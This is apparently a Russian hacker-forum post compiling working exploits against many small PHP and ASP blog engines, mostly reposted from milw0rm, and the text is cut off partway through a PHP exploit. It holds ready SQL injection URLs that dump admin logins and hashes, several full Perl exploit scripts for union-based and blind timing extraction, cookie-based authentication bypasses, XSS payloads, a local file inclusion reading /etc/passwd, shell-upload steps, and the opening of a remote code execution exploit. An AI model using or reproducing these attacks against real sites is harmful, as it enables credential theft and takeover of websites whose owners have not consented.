Раздел называется "Движки CMS и блоги", а вот обзора по блогам, кроме Word Press, я не увидел, будем исправлять))) FlashBlog beta0.31 Remote File Upload Заливаем шелл здесь: Просматриваем здесь: FlashBlog SQL Injection Code: http://[host]/[path]//php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17/**/from/**/usuarios/* Archangel Weblog 0.90.02 Admin Auth Bypass, Upload File, Blind SQL Injection PHP: #!/usr/bin/perl -w # Portal : Archangel Weblog 0.90.02 # Download : http://www.archangelmgt.com/Archangel_Weblog_v090_02.zip # exploit aported password crypted # mgharba :d:d:d:d ######################################## #[*] Founded & Exploited by : Stack-Terrorist [v40] #[*] Contact: Ev!L =>> see down #[*] Greetz : Houssamix & Djekmani & Jadi & iuoisn & Str0ke & All muslims HaCkeRs :) ######################################## #----------------------------------------------------------------------------# ######################################## # * TITLE: PerlSploit Class # * REQUIREMENTS: PHP 4 / PHP 5 # * VERSION: v.1 # * LICENSE: GNU General Public License # * ORIGINAL URL: http://www.v4-Team/v4.txt # * FILENAME: PerlSploitClass.pl # * # * CONTACT: [email protected] (french / english / arabic / moroco Darija :d ) # * THNX : AllaH # * GREETZ: Houssamix & Djekmani ######################################## #----------------------------------------------------------------------------# ######################################## system("color a"); print "\t\t############################################################\n\n"; print "\t\t# Archangel Weblog <= 0.90.02 - Remote SQL Inj Exploit #\n\n"; print "\t\t# by Stack-Terrorist [v40] #\n\n"; print "\t\t############################################################\n\n"; ######################################## #----------------------------------------------------------------------------# ######################################## use LWP::UserAgent; die "Example: perl $0 http://victim.com/path/\n" unless @ARGV; system("color f"); ######################################## #----------------------------------------------------------------------------# ######################################## #the username of news manages $user="author_login"; #the pasword of news manages $pass="author_password"; #the tables of news manages $tab="authors"; ######################################## #----------------------------------------------------------------------------# ######################################## $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); ######################################## #----------------------------------------------------------------------------# ######################################## $host = $ARGV[0] . "/index.php?post_id=-1'/**/union/**/select/**/12,concat(CHAR(60,117,115,101,114,62),".$user.",CHAR(60,117,115,101,114,62),".$pass."),32,4,5,6,3/**/from/**/".$tab."/**/where/**/author_id=1/*"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; ######################################## #----------------------------------------------------------------------------# ######################################## if ($answer =~ /<user>(.*?)<user>/){ print "\nBrought to you by v4-team.com...\n"; print "\n[+] Admin User : $1"; } ######################################## #----------------------------------------------------------------------------# ######################################## if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n"; print "\t\t# Exploit has ben aported user and password hash #\n\n";} else{print "\n[-] Exploit Failed...\n";} ######################################## #-------------------Exploit exploited by Stack-Terrorist --------------------# ######################################## miniBloggie 1.0 Delete Post PHP: if (isset($_GET['post_id'])) $post_id = $_GET['post_id']; if (isset($_GET['confirm'])) $confirm = $_GET['confirm']; [...] elseif ($confirm=="yes") { [...] $sql = "DELETE FROM blogdata WHERE post_id=$post_id"; $query = mysql_query($sql) or die("Cannot query the database.<br>" . mysql_error()); Vulner: Example: Smartblog SQL Injection Code: http://localhost/[script_path]/index.php?idt=-1 UNION SELECT 1,concat_ws(0x3a,pseudo,pass),3,4,5,6,7,8,9 FROM smb_user-- BlogMe PHP SQL Injection Code: http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,3,4,5,6,aes_decrypt(aes_encrypt(user(),0x71),0x71)-- BlogWorx 1.0 SQL Injection Code: http://www.example.com/lab/blogworx1.0/view.asp?id=1+union+select+0,1,2,Password,UserName,5,6+from+Users Blog PixelMotion SQL Injection Code: http://www.xxx.org/blog/index.php?categorie=-1+union+select+0,1,2,database(),4,5,6/* Blog PixelMotion File Upload Заливаем шелл сюда: Получаем здесь: Blog PixelMotion Database Backup Таблица мемберов называется blog_utilisateurs LulieBlog 1.2 Admin Auth Bypass, Upload File, Blind SQL Injection PHP: # LulieBlog 1.2 Multiple Remote Vulnerabilities (Admin Auth Bypass, Upload File, Blind SQL Injection) # Author: Cod3rZ # Site: http://cod3rz.helloweb.eu # Site: http://devilsnight.altervista.org # Date: 06/05/2008 [dd/mm/yyyy] # Admin Auth Bypass: # Modify Articles: send a request to site/Admin/article_modif2.php with: # titre=[titlearticle]&text=[text]&media=[media]&id=[idarticle] # New Article: send a request to site/Admin/article_suppr.php with: # titre=[titlearticle]&text=[text]&media=[media] # Change Admin Username & Blog Title: send a request to site/Admin/util_modif.php with: # pseudo=[newadminnick]&titre=[newblogtitle] # Change Admin Email: send a request to site/Admin/mails_modif.php with: # recevmail=1&emetteur=[email]&desti=[email] # PS: All administration variables are vulnerables! # Upload File (Simple Exploit): <html> <head><title>LulieBlog Uploader - http://cod3rz.helloweb.eu</title></head> <body bgcolor='#000000' text='#FFFFFF'> <form name='cod3rz' action='site/Admin/media_insert.php' method='post' enctype='multipart/form-data'> <font size='1' face='Verdana'> <center> Title:<br> <input type='text' name='titre'><br> File:<br> <input type='file' name='fichier'><br> <input type='hidden' name='lieu' value='0'> Type File:<br> <select name='typemedia'> <option value='1'>Image</option> <option value='2'>Flash</option> <option value='3'>Archive</option> <option value='4'>Vid</option> <option value='6'>Présentation PowerPoint</option> <option value='7'>Fichiers PDF</option> </select><br> <input type='submit' name ='upload' value='Upload'></font></center> </form></body></html> # End # Blind SQL Injection Exploit: #!/usr/bin/perl # LulieBlog 1.2 Remote Blind SQL Injection Exploit # Author : Cod3rZ # Site : http://cod3rz.helloweb.eu # Site : http://devilsnight.altervista.org # Usage : perl lb.pl site use LWP::UserAgent; use HTTP::Request::Common; use Time::HiRes; $ua = LWP::UserAgent->new; $site = "http://127.0.0.1/blog"; if(!$site) { &usage; } @array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); sub usage { print " Usage: perl ig.pl site \n"; print " Ex.: perl ig.pl http://127.0.0.1 \n"; } sub request { $var = $_[0]; $start = Time::HiRes::time(); $response = $ua->request(GET $var,s => $var); $response->is_success() || print("$!\n"); $end = Time::HiRes::time(); $time = $end - $start; return $time } sub refresh{ system("cls"); print " -------------------------------------------------\n"; print " LulieBlog 1.2 Remote Blind Sql Injection Exploit \n"; print " Powered by Cod3rZ \n"; print " http://cod3rz.helloweb.eu \n"; print " -------------------------------------------------\n"; print " Please Wait.. \n"; print " Hash : " . $_[3] . " \n"; print " -------------------------------------------------\n"; } for ($i = 1; $i < 33; $i++) { for ($j = 0; $j < 16; $j++) { $var = $site."/visumedia.php?id=-1' OR (SELECT IF((ASCII(SUBSTRING(`valeur_parametre`,".$i.",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),0) FROM lulieblog_parametres WHERE nom_parametre='pass')/*"; system('pause'); $time = request($var); refresh($host,$timedefault,$j,$hash,$time,$i); if($time > 4) { $time = request($var); refresh($host,$timedefault,$j,$hash,$time,$i); $hash .= chr($array[$j]); refresh($host,$timedefault,$j,$hash,$time,$i); $j=200; }} if($i == 1 && !$hash) { print " Failed \n"; print " -------------------------------------------------\n"; die(); } if($i == 32) { print " Exploit Terminated \n"; print " -------------------------------------------------\n "; system('pause'); }} # http://cod3rz.helloweb.eu Battle Blog <= 1.25 SQL Injection Для MS SQL Server: Для Ms ACCESS: Blogator-script 0.95 Change User Password Уязвимый код: PHP: line 23: $id=$_GET['a']; line 24:$email=$_GET['b']; line 25: $mdp=$_GET['c']; ..... line 27: $sql_change_pass=mysql_query("UPDATE membre SET pass = '$mdp' WHERE id_membre = '$id' AND email LIKE '$email' LIMIT 1"); Code: http://www.site.com/_blogadata/include/init_pass2.php?c=[newpass]&a=[user id]&b=% Blogator-script 0.95 SQL Injection Уязвимый код: PHP: line 27: $id_art=$_GET['id_art']; ...... line 34: $sql_res=mysql_query("SELECT sond_rep, votes_H, votes_F FROM sondage_rep WHERE id_sond = $id_art ORDER BY ordre"); Code: http://www.site.com/_blogadata/include/sond_result.php?id_art=-99999/**/union/**/select/**/concat(pseudo,0x3a,pass,char(58),email),2,3/**/from/**/membre/**/where/**/id_membre=1/* Blogator-script 0.95 File Inclusion eggBlog 4.0 SQL Injection PHP: # Author: __GiReX__ # mySite: girex.altervista.org # Date: 27/03/2008 - 1/04/2008 Added exploit for str0ke # CMS: eggBlog 4.0 # Site: eggblog.net # Bug: SQL Injection (cookie vars) # Type: 1 - Admin/User Authentication Bypass # Bug2: Blind SQL Injection (same vars-query) # Type: Password retrieve exploit # Var : $_COOKIE['email], $_COOKIE['password'] # Need: magic_quotes_gpc = Off # File: index.php require_once "_lib/global.php"; ... eb_pre(); # File: /_lib/globals.php require_once '_lib/user.php'; ... function eb_pre() { ... if(isset($_COOKIE['email']) && isset($_COOKIE['password']) && !isset($_SESSION['user_id'])) eb_login($_COOKIE['email'],$_COOKIE['password'],1); # Let we see function eb_login # File: /_lib/user.php function eb_login($email,$password,$key) { ... if($key==0) $password=md5($password); # Our $key is set to 1 so the password will not cprypted $sql="SELECT user_id FROM eb_users WHERE user_email=\"".$email."\" AND md5(user_password)=\"".$password."\""; $query=mysql_query($sql); # I have no words, 2 vars not sanizated into a SELECT query PoC 1: GET [PATH]/index.php HTTP/1.1 Host: [HOST] ... Cookie: email=@" OR "1; password=@" OR "1 # With this you will be authenticated with the fist record of table eb_user PoC 2: GET [PATH]/index.php HTTP/1.1 Host: [HOST] ... Cookie: email=@" OR "1; password=@" OR "1" AND user_id="[VICTIM_USER_ID] # For anybody you want ############################################################################################################## # Start Blind SQL Injection / Password retrieve exploit # # NOTE: Password is in plain-text so take a coffe... # ############################################################################################################## #!/usr/bin/perl -w # EggBlog v4.0 Blind SQL Injection # Password Retrieve Exploit # Coded by __GiReX__ use LWP::UserAgent; use HTTP::Request; if(not defined $ARGV[0]) { print "usage: perl $0 [host] [path]\n"; print "example: perl $0 localhost /eggblog/\n"; exit; } my $client = new LWP::UserAgent; my @cset = (32..126, 0); my ($i, $j, $hash) = (0, 1, undef); my $host = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0]: 'http://' . $ARGV[0]; $host .= $ARGV[1] unless not defined $ARGV[1]; banner(); check_vuln($host) or die "[-] Site not vulnerable\n"; while($i != $#cset) { for($i = 0; $i <= $#cset; $i++) { my ($pre_time, $post_time) = time(); $rv = check_char($host, $cset[$i], $j); $post_time = time(); info(chr($cset[$i]), $post_time - $pre_time, $hash); if($post_time - $pre_time > 3 and $rv) { $hash .= chr($cset[$i]); last; } } $j++; } print "\n". (defined $hash) ? "[+] Admin password: ${hash} \n": "[-] Exploit mistake: please check benchmark and charset\n"; print "[+] Exploit terminated\n\n"; sub banner { print "\n"; print "[+] EggBlog v4.0 Blind SQL Injection\n"; print "[+] Password Retrieve Exploit\n"; print "[+] Coded by __GiReX__\n"; print "\n"; } sub check_vuln { my ($target, $res) = @_; $get = new HTTP::Request(GET, $target); $get->header('Cookie' => 'email=-1" WHERE X#; password=aaaaaaa;'); $res = $client->request($get); if($res->is_success) { return 1 if $res->content =~ /<b>Warning<\/b>:/; } return 0; } sub check_char { my ($target, $char, $n, $res) = @_; $get->header(Cookie => 'email=-1"+AND+'. 'CASE+WHEN'. '((SELECT(ASCII(SUBSTRING(user_password,'.$n.',1)))FROM+eb_users+WHERE+user_id=1)='.$char.')'. 'THEN+benchmark(90000000,CHAR(0))+'. 'END#; '. 'password=dummy_psw'); $res = $client->request($get); return $res->is_success; } sub info { my ($char, $delay, $hash) = @_; print STDOUT "[+] Admin password: ${hash}".$char."\r" unless not defined $hash; # print STDOUT "[+] Char: ${char} - Delay: ${delay}\r"; $| = 1; } # milw0rm.com [2008-04-01] З.Ы. Буду постепенно добавлять уязвимости....
Neat weblog 0.2 SQL Injection PHP: #!/usr/bin/perl ##################################################################################### #### Neat weblog 0.2 #### #### SQL Injection Exploit #### ##################################################################################### # # #Discovered by : IRCRASH (Dr.Crash) # #Exploited By : Dr.Crash # #IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm # # # ##################################################################################### # # #Script Download : http://kent.dl.sourceforge.net/sourceforge/neat-web/neat0.2.zip # # # ##################################################################################### # < SQL > # #SQL Address : http://Sitename/index.php?action=show&articleId=99999%27union/**/select/**/0,concat(user,0x120,password),2,3,4,5,6,7,8/**/from/**/neat_users/**/where+id=1/* # # ##################################################################################### # Our site : Http://IRCRASH.COM # ##################################################################################### use LWP; use HTTP::Request; use Getopt::Long; sub header { print " **************************************************** * Neat weblog 0.2 Sql Injection exploit * **************************************************** *AUTHOR : IRCRASH * *Discovered by : IRCRASH (Dr.Crash) * *Our Site : IRCRASH.COM * ****************************************************"; } sub usage { print " * Usage : perl $0 -url http://Sitename/ **************************************************** "; } my %parameter = (); GetOptions(\%parameter, "url=s"); $url = $parameter{"url"}; if(!$url) { header(); usage(); exit; } if($url !~ /\//){$url = $url."/";} if($url !~ /http:\/\//){$url = "http://".$url;} $vul = "/index.php?action=show&articleId=99999%27union/**/select/**/0,concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),2,3,4,5,6,7,8/**/from/**/neat_users/**/where+id=1/*"; sub Exploit() { $requestpage = $url.$vul; print "Requesting Page is ".$url."\n"; my $req = HTTP::Request->new("POST",$requestpage); $ua = LWP::UserAgent->new; $ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); $req->referer($url); $req->referer("http://IRCRASH.COM"); $req->content_type('application/x-www-form-urlencoded'); $req->header("content-length" => $contlen); $req->content($poststring); $response = $ua->request($req); $content = $response->content; $header = $response->headers_as_string(); #Debug Modus delete # at beginning of next line #print $content; @name = split(/Login:/,$content); $name = @name[1]; @name = split(/<enduser>/,$name); $name = @name[0]; @password = split(/Password:/,$content); $password = @password[1]; @password = split(/<endpass>/,$password); $password = @password[0]; if(!$name && !$password) { print "\n\n"; print "!Exploit failed ! :(\n\n"; exit; } print "Username: ".$name."\n"; print "Password: " .$password."\n\n"; print "Crack Password And Login In : $url/index.php?action=login\n"; print "Enjoy My friend .....\n"; } #Starting; print " **************************************************** * Neat weblog 0.2 Sql Injection exploit * **************************************************** *AUTHOR : IRCRASH * *Discovered by : IRCRASH (Dr.Crash) * *Our Site : IRCRASH.COM * ****************************************************"; print "\n\nExploiting...\n"; Exploit(); # milw0rm.com [2008-03-31] Lightblog 9.6 local file inclusion Code: http://localhost/LightBlog9.6/view_member.php?username=../../../../../../../../../../etc/passwd%00 Artmedic weblog local file inclusion A-Blog V.2 (id) XSS / SQL Injection PHP: #!/usr/bin/perl ##################################################################################### #### A-Blog V.2 #### #### Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS) #### ##################################################################################### # # #AUTHOR : IRCRASH # #Discovered by : Dr.Crash # #Exploited By : Dr.Crash # #IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm # # # ##################################################################################### # # #Script Download : http://heanet.dl.sourceforge.net/sourceforge/a-blog/A-BlogV2.rar # # # ##################################################################################### # < XSS > # #XSS Address : http://Sitename/search.php?words=<script>alert(document.cookie);</script>&submit=Go # # ##################################################################################### # < SQL > # #SQL Address : http://Sitename/blog.php?view=news&id=9999%27union/**/select/**/CoNcAt(0x4c6f67696e3a,name,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)/**/from/**/site_administrators/* # Help : See Username And Password In Site Title # # ##################################################################################### # Our site : Http://IRCRASH.COM # ##################################################################################### use LWP; use HTTP::Request; use Getopt::Long; sub header { print " **************************************************** * A-Blog V.2 Sql Injection exploit * **************************************************** *AUTHOR : IRCRASH * *Discovered by : Dr.Crash * *Exploited by : Dr.Crash * *Our Site : IRCRASH.COM * ****************************************************"; } sub usage { print " * Usage : perl $0 -url http://Sitename/ **************************************************** "; } my %parameter = (); GetOptions(\%parameter, "url=s"); $url = $parameter{"url"}; if(!$url) { header(); usage(); exit; } if($url !~ /\//){$url = $url."/";} if($url !~ /http:\/\//){$url = "http://".$url;} $vul = "blog.php?view=news&id=9999%27union/**/select/**/CoNcAt(0x4c6f67696e3a,name,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)/**/from/**/site_administrators/*"; sub Exploit() { $requestpage = $url.$vul; print "Requesting Page is ".$url."\n"; my $req = HTTP::Request->new("POST",$requestpage); $ua = LWP::UserAgent->new; $ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); $req->referer($url); $req->referer("http://IRCRASH.COM"); $req->content_type('application/x-www-form-urlencoded'); $req->header("content-length" => $contlen); $req->content($poststring); $response = $ua->request($req); $content = $response->content; $header = $response->headers_as_string(); #Debug Modus delete # at beginning of next line #print $content; @name = split(/Login:/,$content); $name = @name[1]; @name = split(/<enduser>/,$name); $name = @name[0]; @password = split(/Password:/,$content); $password = @password[1]; @password = split(/<endpass>/,$password); $password = @password[0]; if(!$name && !$password) { print "\n\n"; print "!Exploit failed ! :(\n\n"; exit; } print "Username: ".$name."\n"; print "Password: " .$password."\n\n"; print "Crack Password And Login In : $url/admin.php\n"; print "Enjoy My friend .....\n"; } #Starting; print " **************************************************** * A-Blog V.2 Sql Injection exploit * **************************************************** *AUTHOR : IRCRASH * *Discovered by : Dr.Crash * *Exploited by : Dr.Crash * *Our Site : IRCRASH.COM * ****************************************************"; print "\n\nExploiting...\n"; Exploit(); # milw0rm.com [2008-02-03] BlogPHP v.2 (id) XSS / SQL Injection PHP: #!/usr/bin/perl ##################################################################################### #### BlogPHP V.2 #### #### Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS) #### ##################################################################################### # # #AUTHOR : IRCRASH # #Discovered by : Dr.Crash # #Exploited By : Dr.Crash # #IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm # # # ##################################################################################### # # #Script Download : http://puzzle.dl.sourceforge.net/sourceforge/blogphpscript/BlogPHPv2.zip # # ##################################################################################### # < XSS > # #XSS Address : http://Sitename/index.php?search=<script>alert(document.cookie);</script> # # ##################################################################################### # < SQL > # #SQL Address : http://Sitename/index.php?act=page&id=999999999%27union/**/select/**/0,1,CoNcAt(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),3,4/**/from/**/blogphp_users/* # # ##################################################################################### # Our site : Http://IRCRASH.COM # ##################################################################################### use LWP; use HTTP::Request; use Getopt::Long; sub header { print " **************************************************** * SBlogPHP v.2 Sql Injection exploit * **************************************************** *AUTHOR : IRCRASH * *Discovered by : Dr.Crash * *Exploited by : Dr.Crash * *Our Site : IRCRASH.COM * ****************************************************"; } sub usage { print " * Usage : perl $0 -url http://Sitename/ **************************************************** "; } my %parameter = (); GetOptions(\%parameter, "url=s"); $url = $parameter{"url"}; if(!$url) { header(); usage(); exit; } if($url !~ /\//){$url = $url."/";} if($url !~ /http:\/\//){$url = "http://".$url;} $vul = "/index.php?act=page&id=999999999%27union/**/select/**/0,1,CoNcAt(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),3,4/**/from/**/blogphp_users/*"; sub Exploit() { $requestpage = $url.$vul; print "Requesting Page is ".$url."\n"; my $req = HTTP::Request->new("POST",$requestpage); $ua = LWP::UserAgent->new; $ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); #$req->referer($url); $req->referer("http://IRCRASH.COM"); $req->content_type('application/x-www-form-urlencoded'); $req->header("content-length" => $contlen); $req->content($poststring); $response = $ua->request($req); $content = $response->content; $header = $response->headers_as_string(); #Debug Modus delete # at beginning of next line #print $content; @name = split(/Login:/,$content); $name = @name[1]; @name = split(/<enduser>/,$name); $name = @name[0]; @password = split(/Password:/,$content); $password = @password[1]; @password = split(/<endpass>/,$password); $password = @password[0]; if(!$name && !$password) { print "\n\n"; print "!Exploit failed ! :(\n\n"; exit; } print "Username: ".$name."\n"; print "Password: " .$password."\n\n"; print "Crack Md5 Password And Login In : $url/login.html\n"; print "Enjoy My friend .....\n"; } #Starting; print " **************************************************** * SBlogPHP v.2 Sql Injection exploit * **************************************************** *AUTHOR : IRCRASH * *Discovered by : Dr.Crash * *Exploited by : Dr.Crash * *Our Site : IRCRASH.COM * ****************************************************"; print "\n\nExploiting...\n"; Exploit(); # milw0rm.com [2008-02-02] LightBlog 9.5 File Upload Заливаем шелл: Просматриваем: LulieBlog Version 1.02 Sql Injection Code: http://Sitename/voircom.php?id=-1%27union/**/select/**/0,concat(nom_parametre,0x3a,0x3a,valeur_parametre),2,3,4,5/**/from/**/lulieblog_parametres/* Mooseguy Blog System 1.0 SQL Injection Уязвимый код: PHP: <?php $month = $_GET['month']; $result = mysql_query("SELECT * FROM blog WHERE posted='$month' ORDER BY id DESC") or die("HELP QUERY BROKEN"); ... Code: http://[target]/[path]/blog.php?month='+union+select+1,2,3,4,5,concat_ws(0x3a,id,uname,upass),7,8+from+users/* Blogcms 4.2.1b (SQL/XSS) Code: http://[server]/[installdir]/index.php?query=asd&blogid=1,1)+union+select+1,2,user(),database(),mname,6,7,8,9,10,11,mpassword,13,14,15+from+nucleus_member/*
Eggblog <= 3.1.0 Cookies SQL Injection PHP: #!/usr/bin/perl use Tk; use Tk::BrowseEntry; use Tk::DialogBox; use LWP::UserAgent; $mw = new MainWindow(title => "UnderWHAT?!" ); $mw->geometry ( '420x343' ) ; $mw->resizable(0,0); $mw->Label(-text => '', -font => '{Verdana} 8',-foreground=>'red')->pack(); $mw->Label(-text => 'eggblog <= 3.1.0 Cookies Sql Injection', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack(); $mw->Label(-text => 'it will take about half an hour to get hashed password', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack(); $mw->Label(-text => 'you need magic_quotes_gpc turned off and mysql version higher that 4.1', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack(); $mw->Label(-text => '', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack(); $fleft = $mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ; $fright = $mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ; $url = 'http://test2.ru/eggblog/home/index.php'; $user_id = '1'; $prefix = 'eggblog_'; $table = 'users'; $column = 'user_password'; $report = ''; $group = 1; $curr_user = 0; $fleft->Label ( -text => 'Path to forum index: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$url) ->pack ( -side => "top" , -anchor => 'w' ) ; $fleft->Label ( -text => 'User ID: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$user_id) ->pack ( -side => "top" , -anchor => 'w' ) ; $fleft->Label ( -text => 'Database tables prefix: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$prefix) ->pack ( -side => "top" , -anchor => 'w' ) ; $fleft->Label ( -text => 'Returned hash: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$report) ->pack ( -side => "top" , -anchor => 'w' ) ; $fright->Label( -text => ' ')->pack(); $fright->Button(-text => 'Test blog vulnerability', -relief => "groove", -width => '30', -font => '{Verdana} 8 bold', -activeforeground => 'red', -command => \&test_vuln )->pack(); $fright->Button(-text => 'Get hash from database', -relief => "groove", -width => '30', -font => '{Verdana} 8 bold', -activeforeground => 'red', -command => \&get_hash )->pack(); $mw ->Label(-text => '', -font => '{Verdana} 7 bold',-foreground=>'red')->pack(); $fleft->Label(-text => '!', -font => '{Webdings} 22')->pack(); $fleft->Label(-text => 'eggblog 3.1.0', -font => '{Verdana} 7 bold',-foreground=>'red')->pack(); $fleft->Label(-text => 'cookie sql injection ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack(); $fleft->Label(-text => 'mysql char bruteforcing ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack(); $fleft->Label(-text => 'bug in auth function ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack(); $fleft->Label(-text => 'by gemaglabin and Elekt ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack(); $fleft->Label(-text => '( mafia of antichat.ru ) ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack(); $fleft->Label(-text => ' 2007.02.04 ( fixed ) ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack(); $fright->Label(-text => '', -font => '{Verdana} 3 bold',-foreground=>'red')->pack(); $print=$fright->Text(-width=>35,-height=>5,-wrap=>"word")->pack(-side=>"top",-anchor=>"s"); MainLoop(); sub get_hash() { srand(); $xpl = LWP::UserAgent->new( ) or die; $InfoWindow=$mw->DialogBox(-title => 'get hash from database', -buttons => ["OK"]); $i = 1; $b = 0; $report = ''; my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time); $print->insert('end',"- Start [$hour:$min:$sec]\n"); my @brutearray=qw(48 49 50 51 52 53 54 55 56 57 58 97 98 99 100 101 102); while (length($report)<32) { $num = $brutearray[$b]; $ret = get_pchar(); if($ret > 0) { $print->insert('end',"- char [$num] = ".chr($num)."\n"); $report .= chr($num); $b = 0; $i = $i +1; $mw->update(); break; } else { $b = $b +1; } } my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time); $print->insert('end',"- Finish [$hour:$min:$sec]"); } sub get_pchar() { $res = $xpl->get($url,'Cookie'=>"eggblogemail=%;eggblogpassword=' or 1=if(ascii(substring((select password from ".$prefix."members where id=$user_id),$i,1))=$num,1,(select 1 union select 2))/*"); if($res->as_string =~ /MySQL/i) { return 0;} else {return 1;} } sub test_vuln() { $xpl = LWP::UserAgent->new( ) or die; $res = $xpl->get($url,'Cookie'=>"eggblogemail=%;eggblogpassword='"); if($res->is_success) { $rep = ''; if($res->as_string =~ /MySQL/i) { $print->insert('end',"- BLOG VULNERABLE\n"); } else { $print->insert('end',"- BLOG UNVULNERABLE\n");} } } # milw0rm.com [2008-01-07] zBlog v1.2 SQL Injection Code: http://www.xxx.org/zblog/index.php?page=categ&categ=-1%20union%20select%201,pseudo_admin,motdepasse_admin,4,5,6,7,8,9,10,11,12,13,14,15,16,email_admin%20from%20zblog_admins-- mBlog 1.2 Remote File Disclosure Уязвимый код: PHP: ./includes/tpl.php, 41-56: ... 41 // load_tpl 42 // loding a template file into a varible. 43 // use quick_tpl to display template 44 function load_tpl ($path) 45 { 46 $tpl = ''; 47 global $tpl_block; 48 49 if (substr ($path, -4) == '.tpl') 50 { 51 if (strpos (Cur_Url (), 'includes%2F') OR strpos (Cur_Url (), 'admin%2F') OR strpos (Cur_Url (), 'members%2F')) $path = '../'.$path; 52 if (!file_exists ($path)) die ("<B>Template $path not found! Contact webmaster.</B>"); 53 $fp = fopen($path,'r'); 54 while(!feof($fp)) $tpl .= fgets($fp,4096); 55 fclose ($fp); 56 } ... load_tpl() 'loading a template file into a varible.' ;] ./index.php, 24-30: ... 24 // proses cmd 25 switch ($mode) 26 { 27 case 'page': 28 $txt['main_body'] = quick_tpl (load_tpl ($config['skin']."/$page.tpl"), 0); 29 flush_tpl (); 30 break; ... Quick and Dirty Blog 0.4 Local File Inclusion LightBlog 8.4.1.1 Remote Code Execution PHP: #!/usr/bin/php -q -d short_open_tag=on <? echo " LightBlog 8.4.1.1 Remote Code Execution Exploit by BlackHawk <[email protected]> <http://itablackhawk.altervista.org> Thanks to rgod for the php code and Marty for the Love "; if ($argc<3) { echo "Usage: php ".$argv[0]." Host Path Host: target server (ip/hostname) Path: path of lightblog Example: php ".$argv[0]." localhost /lightblog/ dir"; die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); } $host=$argv[1]; $path=$argv[2]; $cmd=""; for ($i=3; $i<=$argc-1; $i++){ $cmd.=" ".$argv[$i]; } $cmd=urlencode($cmd); $port=80; $proxy=""; if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} echo "Step 0 - If Shell already exists, run it..\r\n"; $packet ="GET ".$p."images/piggy_marty.php?cmd=$cmd 